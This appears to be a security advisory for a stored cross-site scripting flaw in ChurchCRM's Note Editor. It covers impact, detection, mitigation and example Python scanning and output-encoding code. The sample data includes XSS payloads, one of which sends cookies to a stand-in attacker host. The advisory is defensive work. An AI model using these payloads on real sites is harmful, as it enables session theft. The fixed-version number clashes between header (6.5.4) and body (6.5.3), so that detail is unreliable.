Platform
php
Component
churchcrm
Fixed in
6.5.4
A stored Cross-Site Scripting (XSS) vulnerability has been identified in ChurchCRM versions 6.5.0 through 6.5.2. The flaw is in the Note Editor: any authenticated user with permission to add notes can store JavaScript in a note, and that script runs in the browser of every user who later views the note. Successful exploitation can compromise other users' sessions, escalate privileges, and expose sensitive church member data. The vulnerability has been patched in version 6.5.3.
Because the payload is stored server-side, the attacker does not need to lure a victim to a crafted link; the script executes whenever another ChurchCRM user, including an administrator, opens the affected record. From there the attacker can hijack that user's session and impersonate them, read or exfiltrate data the victim is allowed to see (member information, financial records, other confidential details), and, if the victim is an administrator, reach administrative functions in the victim's name. In short, a low-privileged note author can reach the privileges of any user who reads their notes.
This vulnerability was publicly disclosed on 2026-04-07. No active exploitation campaigns have been publicly reported, and the vulnerability is not currently listed on CISA KEV. Stored XSS is straightforward to exploit once an attacker has an account with note-adding rights, so public proof-of-concept payloads are likely to emerge.
Churches and religious organizations running ChurchCRM versions 6.5.0 through 6.5.2 are at direct risk. The attack surface is the set of accounts allowed to add notes: deployments that have granted that permission broadly (for example to many volunteers or to shared logins) are more exposed, since each such account is a path to the injection point.
• php: Examine the ChurchCRM application log for JavaScript fragments submitted to notes; adjust the log path below to your installation. Search for characters and patterns commonly associated with XSS payloads.
grep -i 'alert\(' /var/log/churchcrm/error.log
• generic web: Monitor web server access logs for requests whose URL parameters contain script fragments. Note that the note text for this stored XSS is submitted in a POST body, which the default Apache access log does not record, so the authoritative place to look for an injected payload is the stored note text itself (the notes in the ChurchCRM database).
grep -i '<script' /var/log/apache2/access.log
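Because access logs do not capture POST bodies, the reliable check is to scan the stored note text. The following is an added example, not ChurchCRM's own code: it runs a set of XSS indicators over note records after undoing entity and percent encoding, so an obfuscated payload is not missed. The records are constructed sample rows in the shape (note id, entered-by user, note text); in a real check you would feed it the rows exported from the notes table of your ChurchCRM database.

```python
import html
import re
import urllib.parse

# Indicators that a stored note contains active content rather than plain text.
# Patterns are applied to the decoded text, so "&lt;script&gt;" and "%3Cscript%3E"
# are caught as well as a literal "<script>".
XSS_PATTERNS = [
    (re.compile(r"<\s*script\b", re.I), "script tag"),
    (re.compile(r"<[^>]*\son[a-z]+\s*=", re.I), "inline event handler"),
    (re.compile(r"javascript\s*:", re.I), "javascript: URI"),
    (re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I), "active embed element"),
    (re.compile(r"document\.cookie"), "cookie access"),
]


def normalise(text: str) -> str:
    """Strip the encoding layers an attacker may wrap around a payload.

    Runs percent-decoding and HTML entity decoding repeatedly (bounded to a
    few rounds) so that double-encoded payloads are also reduced to their
    literal form before matching.
    """
    out = text
    for _ in range(3):
        decoded = html.unescape(urllib.parse.unquote(out))
        if decoded == out:
            break
        out = decoded
    return out


def scan_note(note_id, author, text):
    """Return a finding dict for one note, or None if nothing suspicious."""
    decoded = normalise(text)
    hits = [label for pattern, label in XSS_PATTERNS if pattern.search(decoded)]
    if not hits:
        return None
    return {"note_id": note_id, "author": author, "indicators": hits}


def scan_notes(notes):
    """Scan an iterable of (id, author, text) rows and return all findings."""
    return [finding for finding in (scan_note(*row) for row in notes) if finding]


# Constructed sample rows for demonstration; not real ChurchCRM data.
SAMPLE_NOTES = [
    (101, "admin", "Met with the Smith family about the building fund."),
    (102, "volunteer", "<script>fetch('//attacker.example/?c='+document.cookie)</script>"),
    (103, "volunteer", '<img src=x onerror="alert(1)">'),
    (104, "volunteer", "&lt;svg onload=alert(1)&gt;"),
    (105, "admin", "Pastoral visit scheduled; see %3Cscript%3Ealert(1)%3C/script%3E"),
    (106, "office", "Contact: follow-up on Monday"),
]

if __name__ == "__main__":
    for finding in scan_notes(SAMPLE_NOTES):
        print(finding)
```

The event-handler pattern deliberately requires the `on...=` to sit inside a tag, so ordinary prose such as "follow-up on Monday" does not trigger it. Any note the scan flags should be reviewed together with the author account that entered it, since that account is either compromised or malicious.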
Exploit status
EPSS
0.03% (9th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2026-35574 is to upgrade ChurchCRM to version 6.5.3 or later immediately. If upgrading is not immediately feasible, apply output encoding to note text where the Note Editor renders it, and validate input on the way in; encoding on output is what actually prevents the stored payload from executing. A Web Application Firewall configured to block common XSS payloads adds a layer of defense but is not a substitute for the patch. Regularly review ChurchCRM configurations and user permissions, in particular which accounts may add notes, to keep the attack surface small. After upgrading, confirm the fix in a test instance by entering a simple JavaScript payload into the Note Editor and verifying that it is displayed as text rather than executed.
Update ChurchCRM to version 6.5.3 or later to mitigate the XSS vulnerability. Make sure to back up your database before updating. Review the audit logs for any suspicious activity after the update.
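To make the interim advice concrete, here is an added example (not ChurchCRM code) that contrasts three ways of rendering a stored note into an HTML body: direct interpolation (the stored-XSS pattern), a naive "input validation" blocklist that only strips script tags, and proper output encoding. The payloads are constructed for the demonstration and are not taken from the advisory; the `render_note_*` functions and `is_inert` check are illustrative helpers, not ChurchCRM's API.

```python
import html
import re

# Constructed note-author payloads for the demonstration.
PAYLOADS = [
    "<script>alert(document.cookie)</script>",
    "<img src=x onerror=alert(1)>",
    '<a href="javascript:alert(1)">click</a>',
    "<ScRiPt>alert(1)</ScRiPt>",
]

WRAP_OPEN = "<div class='note'>"
WRAP_CLOSE = "</div>"


def render_note_vulnerable(note_text: str) -> str:
    """Interpolates the stored note straight into HTML: the stored-XSS pattern."""
    return f"{WRAP_OPEN}{note_text}{WRAP_CLOSE}"


def render_note_blocklist(note_text: str) -> str:
    """Naive 'sanitizing': removes <script> tags only.

    Stops the first payload but not event handlers or javascript: URIs,
    which is why a blocklist is not an adequate interim fix.
    """
    cleaned = re.sub(r"</?script[^>]*>", "", note_text, flags=re.I)
    return f"{WRAP_OPEN}{cleaned}{WRAP_CLOSE}"


def render_note_encoded(note_text: str) -> str:
    """Output encoding for an HTML body context.

    Every <, >, &, " and ' becomes a character entity, so the browser shows
    the note text verbatim and never parses any of it as markup.
    """
    return f"{WRAP_OPEN}{html.escape(note_text, quote=True)}{WRAP_CLOSE}"


def is_inert(rendered: str) -> bool:
    """True if the note content cannot create an element.

    In an HTML body context, text that contains no '<' cannot open a tag,
    and without a tag there is no attribute, handler or script to execute.
    """
    inner = rendered[len(WRAP_OPEN):-len(WRAP_CLOSE)]
    return "<" not in inner


def surviving_payloads(renderer):
    """Return the payloads that still reach the browser as markup."""
    return [p for p in PAYLOADS if not is_inert(renderer(p))]


if __name__ == "__main__":
    for name, renderer in [
        ("vulnerable", render_note_vulnerable),
        ("blocklist", render_note_blocklist),
        ("encoded", render_note_encoded),
    ]:
        print(f"{name}: {len(surviving_payloads(renderer))} of {len(PAYLOADS)} payloads survive")
```

If the Note Editor is meant to accept formatted text, escaping everything would strip legitimate formatting; in that case the correct replacement for the blocklist is an HTML sanitizer with an explicit allowlist of tags and attributes, applied before storage and again on output.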
CVE-2026-35574 is a stored Cross-Site Scripting (XSS) vulnerability in ChurchCRM versions 6.5.0 through 6.5.2 that lets a user with note-adding permission execute JavaScript in the browsers of other users who view the note.
You are affected if you are running ChurchCRM versions 6.5.0, 6.5.1, or 6.5.2. Upgrade to 6.5.3 to mitigate the risk.
Upgrade ChurchCRM to version 6.5.3 or later. Implement input validation and output encoding as an interim measure.
While no active exploitation has been confirmed, the XSS nature of the vulnerability suggests a high likelihood of exploitation if left unpatched.
Refer to the ChurchCRM security advisories on their official website or GitHub repository for the latest information.